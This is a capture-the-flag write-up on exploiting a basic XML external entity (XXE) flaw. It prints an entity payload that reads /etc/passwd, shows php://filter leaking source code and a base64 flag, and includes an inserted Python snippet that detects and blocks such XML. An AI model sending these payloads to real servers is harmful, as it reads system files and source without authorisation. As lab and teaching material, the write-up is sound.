XXE basic (CTFS)


Hello guys, XXE is the kind of vulnerability that I LIKE. Today, I will introduce it via a challenge in CTFS… Okayyyyyyyyy! Look at the basic source >.<


This is the basic XML the page sends to the server -…- Here, we need to inject malicious code into that XML.

For example:

[screenshot: 1.PNG]

Malicious payload:

<!DOCTYPE replace [
<!ENTITY doc SYSTEM "file:///etc/passwd">
]>

(/etc/passwd for Linux)

Trigger it by inserting &doc; into the input sent to the server.

Next, I extract local source code with the php://filter wrapper.

php://filter allows a pen tester to include local files and base64 encodes the output. Therefore, any base64 output will need to be decoded to reveal the contents.
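As an added example (not code from the original write-up), here is the defender's side of the two tricks above: a pre-parse triage that flags the DOCTYPE and external entity in untrusted XML, a parse wrapper that refuses such documents, and a helper that decodes php://filter output. The sample request body is constructed for illustration; only the entity name doc and the feed.php filename come from the page.

```python
import base64
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed request body of the shape the write-up describes (not captured traffic).
MALICIOUS_XML = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE replace [\n'
    '<!ENTITY doc SYSTEM "php://filter/convert.base64-encode/resource=feed.php">\n'
    ']>\n'
    '<root><name>&doc;</name></root>'
)
BENIGN_XML = '<root><name>alice</name></root>'

# URI schemes an external entity in untrusted input should never point at.
RISKY_SCHEMES = ("file:", "php:", "expect:", "http:", "https:", "ftp:", "jar:", "gopher:")

def xxe_indicators(xml_text):
    """Pre-parse triage: report DOCTYPE and external entities via expat callbacks (no regex)."""
    report = {"doctype": False, "external_entities": [], "risky_uris": []}
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)  # never fetch DTDs

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = True

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None:  # SYSTEM/PUBLIC entity: content comes from outside the document
            report["external_entities"].append((name, sysid))
            if sysid.lower().startswith(RISKY_SCHEMES):
                report["risky_uris"].append(sysid)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError:
        pass  # malformed input still yields whatever declarations were seen
    return report

def safe_parse(xml_text):
    """Refuse any document carrying a DOCTYPE before the real parser sees it."""
    if xxe_indicators(xml_text)["doctype"]:
        raise ValueError("DOCTYPE not allowed in untrusted XML")
    return ET.fromstring(xml_text)

def decode_filter_output(b64_text):
    """Recover the file leaked through php://filter convert.base64-encode (whitespace tolerated)."""
    return base64.b64decode("".join(b64_text.split())).decode("utf-8", "replace")
```

Running xxe_indicators over request bodies in a log pipeline gives a cheap detection for the payload shape shown above, while safe_parse is the server-side fix.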

[screenshot: 2.PNG]

The main page is “feed.php”; I try guessing with “flag”. Oh god, correct!!!

[screenshot: 3.PNG]

I receive a flag: U2VjdXJpbmV0c3tYeGVfeFhFX0BMbF9UaDNfV0BZfQo==

It is base64, and decoding it gives the flag: Securinets{Xxe_xXE_@Ll_Th3_W@Y}

BoNuS DoCuMeNtS: https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html

—————THANK YOUUUUU ❤ ——
